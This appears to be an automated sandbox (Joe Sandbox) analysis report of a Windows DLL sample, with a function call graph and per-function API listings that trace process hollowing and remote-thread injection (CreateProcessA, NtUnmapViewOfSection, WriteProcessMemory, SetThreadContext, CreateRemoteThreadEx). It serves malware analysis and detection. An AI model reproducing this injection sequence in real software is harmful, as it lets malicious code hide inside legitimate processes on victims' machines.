6212->6214 6213 1008379e VirtualProtect 6213->6213 6215 100837bd 6213->6215 6214->6213 6214->6215 6215->6209 6134 1000b4e0 6137 10008f24 6134->6137 6138 10008f2c 6137->6138 6143 10001027 6138->6143 6140 10008f31 6151 100013d3 6140->6151 6142 10008f36 6144 1000103a 6143->6144 6145 100010d6 WSAStartup 6144->6145 6146 10001157 6145->6146 6188 10009520 6146->6188 6148 10001190 6149 10009520 5 API calls 6148->6149 6150 100011db 6149->6150 6150->6140 6198 100017ab 6151->6198 6153 100013e1 6154 10009660 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6153->6154 6155 10001401 6154->6155 6156 1000141e GetModuleFileNameA 6155->6156 6157 10001447 6156->6157 6158 10001817 16 API calls 6157->6158 6159 10001464 6158->6159 6160 100096a0 8 API calls 6159->6160 6161 10001489 6160->6161 6162 10009710 SetFileAttributesA 6161->6162 6163 100014dd 6162->6163 6164 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6163->6164 6165 100014f1 6164->6165 6166 10002d31 14 API calls 6165->6166 6167 1000150d 6166->6167 6168 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6167->6168 6169 1000152e 6168->6169 6170 1000300a CreateFileA WriteFile FindCloseChangeNotification 6169->6170 6171 1000154f 6170->6171 6172 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6171->6172 6173 10001570 6172->6173 6174 10001583 LoadLibraryA 6173->6174 6175 10001598 6174->6175 6176 10009730 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA GetModuleFileNameA 6175->6176 6177 100015c4 6176->6177 6178 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6177->6178 6181 100015db 6178->6181 6179 10001635 CreateRemoteThreadEx 6187 1000166f 6179->6187 6180 10001686 6182 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6180->6182 6181->6179 6181->6180 6183 10001697 6182->6183 6184 10003356 33 API calls 6183->6184 6185 1000171a 6184->6185 6186 10001753 CreateRemoteThreadEx 6185->6186 6186->6187 6187->6142 6189 10009531 6188->6189 6192 10009536 6188->6192 6195 10009360 6189->6195 6191 10009594 6191->6148 6192->6191 6193 10009430 4 API calls 6192->6193 6194 10009579 6193->6194 6194->6148 6196 10009370 6195->6196 6197 10009369 GetModuleHandleA 6195->6197 6196->6192 6197->6196 6200 100017b4 GetPEB 6198->6200 6201 100017c3 6200->6201 7145 1000b360 7146 1000b36d 7145->7146 7147 1000b381 7146->7147 7148 1000b373 FreeLibrary 7146->7148 7148->7146 7148->7147 7209 100099e0 7210 1000b740 2 API calls 7209->7210 7211 100099ee 7210->7211 7212 100099f5 ??3@YAXPAX 7211->7212 7213 100099fe 7211->7213 7212->7213 7226 100045fc 7227 10004633 7226->7227 7228 10005d6f 2 API calls 7227->7228 7229 1000464d 7228->7229 7230 10004786 CreateProcessA 7229->7230 7231 1000487e 7230->7231 7232 100049a4 GetThreadContext 7231->7232 7255 1000496f 7231->7255 7233 10004b18 7232->7233 7234 10009520 5 API calls 7233->7234 7235 10004bcb 7234->7235 7236 10004ccd 7235->7236 7237 10004cdf 7235->7237 7238 10005e5f 2 API calls 7236->7238 7239 10004d24 ReadProcessMemory 7237->7239 7238->7255 7240 10004d39 7239->7240 7241 10004d50 7240->7241 7242 10004d62 NtUnmapViewOfSection 7240->7242 7243 10005e5f 2 API calls 7241->7243 7244 10004d85 7242->7244 7243->7255 7245 10004db1 VirtualAllocEx 7244->7245 7246 10004d9f 7244->7246 7248 10004dfc 7245->7248 7247 10005e5f 2 API calls 7246->7247 7247->7255 7249 10004e16 7248->7249 7252 10004e28 7248->7252 7250 10005e5f 2 API calls 7249->7250 7250->7255 7251 10004e50 WriteProcessMemory 7253 10004e8f 7251->7253 7252->7251 7253->7253 7254 10005084 LocalSize 7253->7254 7277 1000509b 7254->7277 7256 100057c5 7257 1000580d WriteProcessMemory 7256->7257 7258 10005822 7257->7258 7259 10005884 SetThreadContext 7258->7259 7260 100059f8 7259->7260 7262 10009520 5 API calls 7260->7262 7261 10005369 LocalSize 7261->7277 7263 10005aab 7262->7263 7264 10005b9c ResumeThread 7263->7264 7265 10005bc2 7264->7265 7266 10005bd9 WaitForSingleObject 7265->7266 7267 10005bfd 7265->7267 7266->7267 7267->7255 7268 10005c14 CloseHandle 7267->7268 7270 10005c43 CloseHandle 7268->7270 7271 10005c36 7268->7271 7269 100054d0 RtlMoveMemory 7269->7277 7270->7255 7271->7270 7272 10009520 GetModuleHandleA ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 7272->7277 7273 10005f47 2 API calls 7273->7277 7274 10005660 7275 10005e5f 2 API calls 7274->7275 7275->7255 7276 1000571b WriteProcessMemory 7276->7277 7277->7256 7277->7261 7277->7269 7277->7272 7277->7273 7277->7274 7277->7276 7278 1000579b VirtualProtectEx 7277->7278 7278->7277

    Executed Functions

    Function 10003356 Relevance: 37.0, APIs: 22, Instructions: 4041COMMON
    Download Yara Rule
    APIs
    • LocalSize.KERNEL32(00000000), ref: 1000372A
    • RtlMoveMemory.NTDLL(00000000,?), ref: 100039B0
    • LocalSize.KERNEL32(00000000), ref: 10003D81
    • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 1000417F
    • LocalSize.KERNEL32(00000000), ref: 10004484
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: LocalSize$MemoryMove
    • String ID:
    • API String ID: 2329245388-0
    • Opcode ID: bead1b6c8d740f65976db46c7ef4eb727438f1c87399e36b62186f5f465c3754
    • Instruction ID: 6597548e417ce41973f24dc3fe005e763f74c0b4b92ccc5acbc8f0888a27e9fc
    • Opcode Fuzzy Hash: bead1b6c8d740f65976db46c7ef4eb727438f1c87399e36b62186f5f465c3754
    • Instruction Fuzzy Hash: 9163A4F5A812568BFB00CF58DCC1699B7F1FF69364B291471E846AB304D378B861DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10001817 Relevance: 14.1, APIs: 9, Instructions: 597nativememoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 481 10001817-10001890 call 10008f42 485 10001e94-10001e99 481->485 486 10001896-100018af call 10001f4e call 100017fe 481->486 487 10001eae-10001eba 485->487 502 100018b0-100018b8 486->502 490 10001ebc 487->490 491 10001ecd 487->491 493 10001ebe-10001ec2 490->493 494 10001ed3-10001f06 call 10008f3c * 3 491->494 495 10001f08-10001f15 call 10008f3c 491->495 498 10001ec4-10001ec7 493->498 499 10001ec9-10001ecb 493->499 494->495 504 10001f20-10001f24 495->504 505 10001f17-10001f1d call 10008f3c 495->505 498->493 499->491 506 10001958-10001966 502->506 507 100018be-100018cc call 10001007 502->507 505->504 511 10001968 506->511 512 10001979 506->512 521 100018db-100018df 507->521 522 100018ce-100018d8 call 10008f48 507->522 518 1000196a-1000196e 511->518 514 100019b4-100019dd call 10008f3c call 100024e3 512->514 515 1000197f-100019b2 call 10008f3c * 3 512->515 544 100019e8-100019fb GetModuleHandleA 514->544 545 100019df-100019e5 call 10008f3c 514->545 515->514 524 10001970-10001973 518->524 525 10001975-10001977 518->525 530 100018e1-100018eb call 10008f48 521->530 531 100018ee-10001900 521->531 522->521 524->518 525->512 530->531 536 10001950-10001953 531->536 537 10001906-10001914 call 10001007 531->537 536->502 548 10001923-10001927 537->548 549 10001916-10001920 call 10008f48 537->549 546 10001a0a-10001a12 544->546 547 100019fd-10001a07 call 10008f48 544->547 545->544 554 10001a14-10001a1a call 10008f3c 546->554 555 10001a1d-10001a3c call 100024e3 546->555 547->546 556 10001936-1000194b 548->556 557 10001929-10001933 call 10008f48 548->557 549->548 554->555 567 10001a47-10001a5b call 100027c4 555->567 568 10001a3e-10001a44 call 10008f3c 555->568 556->506 557->556 573 10001a66-10001a85 call 100024e3 567->573 574 10001a5d-10001a63 call 10008f3c 567->574 568->567 579 10001a90-10001aa4 call 100027c4 573->579 580 10001a87-10001a8d call 10008f3c 573->580 574->573 585 10001aa6-10001aac call 10008f3c 579->585 586 10001aaf-10001ace call 100024e3 579->586 580->579 585->586 591 10001ad0-10001ad6 call 10008f3c 586->591 592 10001ad9-10001aed call 100027c4 586->592 591->592 597 10001af8-10001b2a NtAllocateVirtualMemory 592->597 598 10001aef-10001af5 call 10008f3c 592->598 600 10001b39-10001b40 597->600 601 10001b2c-10001b36 call 10008f48 597->601 598->597 600->485 602 10001b46-10001b70 NtReadVirtualMemory 600->602 601->600 605 10001b72-10001b7c call 10008f48 602->605 606 10001b7f-10001b86 602->606 605->606 609 10001e5b-10001e85 NtFreeVirtualMemory 606->609 610 10001b8c-10001b90 606->610 609->485 614 10001e87-10001e91 call 10008f48 609->614 612 10001bc2-10001bcc call 1000283c 610->612 613 10001b96-10001bb3 610->613 612->609 620 10001bd2-10001c06 NtAllocateVirtualMemory 612->620 613->612 621 10001bb5-10001bbf call 10008f48 613->621 614->485 622 10001c15-10001c1c 620->622 623 10001c08-10001c12 call 10008f48 620->623 621->612 626 10001c22-10001c26 622->626 627 10001d56-10001d6e 622->627 623->622 626->627 630 10001c2c-10001c33 626->630 635 10001d70-10001d7a call 10008f48 627->635 636 10001d7d-10001d84 627->636 631 10001c35-10001c46 call 10008f42 630->631 632 10001c48-10001c4e 630->632 631->632 637 10001c50-10001c56 call 10008f3c 632->637 638 10001c59-10001c69 632->638 635->636 636->609 641 10001d8a-10001db6 NtAllocateVirtualMemory 636->641 637->638 643 10001c70-10001c91 call 100097d0 638->643 644 10001c6b 638->644 647 10001dc5-10001dcc 641->647 648 10001db8-10001dc2 call 10008f48 641->648 653 10001c93 643->653 654 10001c96-10001ca7 643->654 644->643 647->609 650 10001dd2-10001dfc 647->650 648->647 657 10001e0b-10001e12 650->657 658 10001dfe-10001e08 call 10008f48 650->658 653->654 661 10001cb6-10001cfd call 10002d17 NtFreeVirtualMemory 654->661 662 10001ca9-10001cb3 call 10008f48 654->662 657->609 663 10001e18-10001e42 NtFreeVirtualMemory 657->663 658->657 673 10001d0c-10001d36 NtFreeVirtualMemory 661->673 674 10001cff-10001d09 call 10008f48 661->674 662->661 666 10001e51-10001e56 663->666 667 10001e44-10001e4e call 10008f48 663->667 666->487 667->666 675 10001d45-10001d51 673->675 676 10001d38-10001d42 call 10008f48 673->676 674->673 675->487 676->675
    APIs
    • GetModuleHandleA.KERNEL32(?,?,?,00000000,00000001,00000001), ref: 100019EE
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,00001000,00000040), ref: 10001B1D
    • NtReadVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,?), ref: 10001B63
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,?,00001000,00000040), ref: 10001BF9
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001CF0
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001D29
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,00003000,00000040), ref: 10001DA9
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001E35
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001E78
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: MemoryVirtual$Free$Allocate$HandleModuleRead
    • String ID:
    • API String ID: 3626904461-0
    • Opcode ID: e41221d228e3099dbaa53f065df4f9fc7eb341e2a8ca2d0f562e219e06e247af
    • Instruction ID: 18045018c71ed80e37ca4e743997fd2e00c365ecd51ce7d830d4e4c8732093b4
    • Opcode Fuzzy Hash: e41221d228e3099dbaa53f065df4f9fc7eb341e2a8ca2d0f562e219e06e247af
    • Instruction Fuzzy Hash: 6D1249B1D10219ABFF40DFA4DC82BEEB7B9EB09390F105035F515B6285E771AA44CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100013D3 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 299threadlibraryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 700 100013d3-10001413 call 100017ab call 10009660 705 10001415-1000141b call 10008f3c 700->705 706 1000141e-10001445 GetModuleFileNameA 700->706 705->706 708 10001454-10001472 call 10001817 706->708 709 10001447-10001451 call 10008f48 706->709 715 10001474 708->715 716 10001479-1000149b call 100096a0 708->716 709->708 715->716 719 100014a6-100014c6 716->719 720 1000149d-100014a3 call 10008f3c 716->720 722 100014c8 719->722 723 100014cd-100014f9 call 10009710 call 100024e3 719->723 720->719 722->723 729 10001504-10001512 call 10002d31 723->729 730 100014fb-10001501 call 10008f3c 723->730 735 10001514-1000151a call 10008f3c 729->735 736 1000151d-10001536 call 100024e3 729->736 730->729 735->736 741 10001541-10001554 call 1000300a 736->741 742 10001538-1000153e call 10008f3c 736->742 747 10001556-1000155c call 10008f3c 741->747 748 1000155f-10001578 call 100024e3 741->748 742->741 747->748 753 10001583-10001596 LoadLibraryA 748->753 754 1000157a-10001580 call 10008f3c 748->754 756 100015a5-100015aa 753->756 757 10001598-100015a2 call 10008f48 753->757 754->753 760 100015b5-100015e3 call 10009730 call 100024e3 756->760 761 100015ac-100015b2 call 10008f3c 756->761 757->756 769 100015e5-100015eb call 10008f3c 760->769 770 100015ee-10001610 call 10001336 760->770 761->760 769->770 775 10001612-10001618 call 10008f3c 770->775 776 1000161b-10001620 770->776 775->776 778 10001622-10001628 call 10008f3c 776->778 779 1000162b-1000162f 776->779 778->779 780 10001635-1000166d CreateRemoteThreadEx 779->780 781 10001686-1000169f call 100024e3 779->781 784 1000167c-10001681 780->784 785 1000166f-10001679 call 10008f48 780->785 792 100016a1-100016a7 call 10008f3c 781->792 793 100016aa-1000171f call 10008f42 call 10003356 781->793 789 100017a7-100017aa 784->789 785->784 792->793 800 10001721-10001727 call 10008f3c 793->800 801 1000172a-1000172f 793->801 800->801 803 10001731-10001737 call 10008f3c 801->803 804 1000173a-1000173f 801->804 803->804 807 10001741-10001747 call 10008f3c 804->807 808 1000174a-1000178e call 10008f3c CreateRemoteThreadEx 804->808 807->808 814 10001790-1000179a call 10008f48 808->814 815 1000179d-100017a2 808->815 814->815 815->789
    APIs
    • GetModuleFileNameA.KERNEL32(000000FF), ref: 10001438
    • LoadLibraryA.KERNELBASE(?,?,?,10069CE3,?,?,?), ref: 10001589
    • CreateRemoteThreadEx.KERNELBASE(FFFFFFFF,00000000,00000000,1000753C,00000000,00000000,00000000,00000000), ref: 10001660
    • CreateRemoteThreadEx.KERNELBASE(FFFFFFFF,00000000,00000000,Function_00008E08,00000000,00000000,00000000,00000000), ref: 10001781
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: CreateRemoteThread$FileLibraryLoadModuleName
    • String ID: -K NetworkService
    • API String ID: 1086537905-2689450296
    • Opcode ID: b0c4e49a0226506626da4696a25d283b1a2ed37e453f38bc93039b9eaa77c593
    • Instruction ID: 192b5ded5049eacffa80d3a177baae0e671814ab7fcffe4313666e61edc3dd04
    • Opcode Fuzzy Hash: b0c4e49a0226506626da4696a25d283b1a2ed37e453f38bc93039b9eaa77c593
    • Instruction Fuzzy Hash: 07A121B5E10345ABFB40DFA0CCC2BEE76B9EB14780F104075F605BB286EA75AB149B51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000300A Relevance: 4.7, APIs: 3, Instructions: 220fileCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • CreateFileA.KERNELBASE(00000000,00000002,00000000,00000000,00000002,00000020,00000000), ref: 1000308D
    • WriteFile.KERNELBASE(00000000,10007715,00000000,?,00000000), ref: 1000324E
    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 10003270
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: File$ChangeCloseCreateFindNotificationWrite
    • String ID:
    • API String ID: 3805958096-0
    • Opcode ID: 56f5217a5ff58419c402300fced1701773d6cbec5d636d564aa0362071dec691
    • Instruction ID: d20d66cfc10cbe3857bc80674b720ab49801aad87d9546e672d044fe8a3a2069
    • Opcode Fuzzy Hash: 56f5217a5ff58419c402300fced1701773d6cbec5d636d564aa0362071dec691
    • Instruction Fuzzy Hash: C0619AF5D00205AFFB41DFA4DC83BAF77B5EB09380F104075F645AB286E6756A448BA2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10009430 Relevance: 4.5, APIs: 3, Instructions: 25memorywindowCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 895 10009430-10009437 896 10009444-10009457 RtlAllocateHeap 895->896 897 10009439-1000943f GetProcessHeap 895->897 898 10009475-10009478 896->898 899 10009459-10009472 MessageBoxA call 10009390 896->899 897->896 899->898
    APIs
    • GetProcessHeap.KERNEL32(1000B517,00000008,00000002,00000000,10009825,00000007,00000003,?,?,1000261C,00000003,00000000,00000000,80000005,00000002,00000000), ref: 10009439
    • RtlAllocateHeap.NTDLL(1006A1D4,00000008,80000301), ref: 1000944D
    • MessageBoxA.USER32(00000000,10069FE8,10069FB4,00000010), ref: 10009466
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: Heap$AllocateMessageProcess
    • String ID:
    • API String ID: 2992861138-0
    • Opcode ID: 03d92ac7cbc8daedce1c15d98e9ff78b1ea41ed49775963adbdf35a54df7367f
    • Instruction ID: ca495d503fa8b24896a3a0ddeaa4d588f6ba14c0d85a12038cb70845f0cd2cd9
    • Opcode Fuzzy Hash: 03d92ac7cbc8daedce1c15d98e9ff78b1ea41ed49775963adbdf35a54df7367f
    • Instruction Fuzzy Hash: 59E0D8B56401317BF310FB609C49F8A7698DB057C1F014015FD05D6154E774D8018B71
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10002D31 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 902 10002d31-10002d7f call 10008f42 PathIsDirectoryA 905 10002d81-10002d8b call 10008f48 902->905 906 10002d8e-10002d90 902->906 905->906 907 10002da0-10002dc0 906->907 908 10002d96-10002d9b 906->908 911 10002dc2 907->911 912 10002dc7-10002dec call 10009850 907->912 910 10002fad-10002fb9 908->910 915 10002fbb 910->915 916 10002fcc 910->916 911->912 922 10002dee 912->922 923 10002dff 912->923 918 10002fbd-10002fc1 915->918 919 10002fd2-10002fd7 916->919 920 10002feb-10002ff8 call 10008f3c 916->920 924 10002fc3-10002fc6 918->924 925 10002fc8-10002fca 918->925 926 10002fe4-10002fe9 919->926 927 10002fd9-10002fe3 call 10008f3c 919->927 934 10003003-10003007 920->934 935 10002ffa-10003000 call 10008f3c 920->935 929 10002df0-10002df4 922->929 930 10002e05-10002e0a 923->930 931 10002e1e-10002e39 call 10008f3c call 10001007 923->931 924->918 925->916 926->919 926->920 927->926 936 10002df6-10002df9 929->936 937 10002dfb-10002dfd 929->937 938 10002e17-10002e1c 930->938 939 10002e0c-10002e16 call 10008f3c 930->939 948 10002e48-10002e71 call 10002487 931->948 949 10002e3b-10002e45 call 10008f48 931->949 935->934 936->929 937->923 938->930 938->931 939->938 954 10002e73-10002e79 call 10008f3c 948->954 955 10002e7c-10002ead call 100017fe call 10001f27 948->955 949->948 954->955 962 10002eae-10002eb6 955->962 963 10002fa2-10002fa8 962->963 964 10002ebc-10002ee1 call 10001007 call 10001f27 962->964 963->910 969 10002ef0-10002ef4 964->969 970 10002ee3-10002eed call 10008f48 964->970 972 10002f03-10002f31 call 10002487 969->972 973 10002ef6-10002f00 call 10008f48 969->973 970->969 979 10002f33-10002f39 call 10008f3c 972->979 980 10002f3c-10002f53 PathIsDirectoryA 972->980 973->972 979->980 982 10002f62-10002f6a 980->982 983 10002f55-10002f5f call 10008f48 980->983 986 10002f70-10002f88 982->986 987 10002f9a-10002f9d 982->987 983->982 990 10002f97 986->990 991 10002f8a-10002f94 call 10008f48 986->991 987->962 990->987 991->990
    APIs
    • PathIsDirectoryA.SHLWAPI(00000000), ref: 10002D72
    • PathIsDirectoryA.SHLWAPI(00000000), ref: 10002F46
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: DirectoryPath
    • String ID:
    • API String ID: 1580926078-0
    • Opcode ID: 952b3ee820ae0fce44b1993c9e55d840ad73d41c8d9cbaca60f6c06b9dd94f26
    • Instruction ID: 1ec6a9b9599abdcb0927499382ee2c56efe62a98ad550a515e2561b25c9f74a4
    • Opcode Fuzzy Hash: 952b3ee820ae0fce44b1993c9e55d840ad73d41c8d9cbaca60f6c06b9dd94f26
    • Instruction Fuzzy Hash: 368151B5E00206ABFB40DFA4DC82BBEB7B5EF193C0F140079E545F6249E771AA548762
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10004606 Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: a21b6345c22cde698bb8e6042296a18b9237ae50acfa973f10934829fa115130
    • Instruction ID: 6bd08ba5558e1723e664c623841c749a5d5f02c338c490c126332124de29b97e
    • Opcode Fuzzy Hash: a21b6345c22cde698bb8e6042296a18b9237ae50acfa973f10934829fa115130
    • Instruction Fuzzy Hash: 35B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10004610 Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 1999a4e140ade5994fbc139359fbd3a3e3541bf41f421a645fe8dc29bbbb4e7d
    • Instruction ID: a6a88fea8a15b71c93179c30403b5c246083cf119354f26f4d88da3cc7a861b2
    • Opcode Fuzzy Hash: 1999a4e140ade5994fbc139359fbd3a3e3541bf41f421a645fe8dc29bbbb4e7d
    • Instruction Fuzzy Hash: 56B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000461A Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 21b147d3242dff41688a4e607ccc271381ba4f9bf2a3db1154b2a9a322427d62
    • Instruction ID: 18200786322e2296e48886ba80c3c0a0571579295a8a8f8cccfe2eafa6c45a37
    • Opcode Fuzzy Hash: 21b147d3242dff41688a4e607ccc271381ba4f9bf2a3db1154b2a9a322427d62
    • Instruction Fuzzy Hash: 33B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10004624 Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: a8e977d5e6929cacd8ac213e15fadd063f0ff8242314a0019d4a04ef5fe6b589
    • Instruction ID: 2ab24672fad017e54084c68c726b6677777c2dd61183461ce3e7d2b956ec3b11
    • Opcode Fuzzy Hash: a8e977d5e6929cacd8ac213e15fadd063f0ff8242314a0019d4a04ef5fe6b589
    • Instruction Fuzzy Hash: 42B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100045FC Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 3dc280fe55abc01b58db292e390aabea07e0da105420eb392ee7620be3622837
    • Instruction ID: 4fc1348e7e92fee5a10d5f52c872e9f0b591b432bef915be5527e0563184c5c5
    • Opcode Fuzzy Hash: 3dc280fe55abc01b58db292e390aabea07e0da105420eb392ee7620be3622837
    • Instruction Fuzzy Hash: 85B1A8F1A402529BFF00CFA8DCC1B8977A5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000462E Relevance: 1.8, APIs: 1, Instructions: 319processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
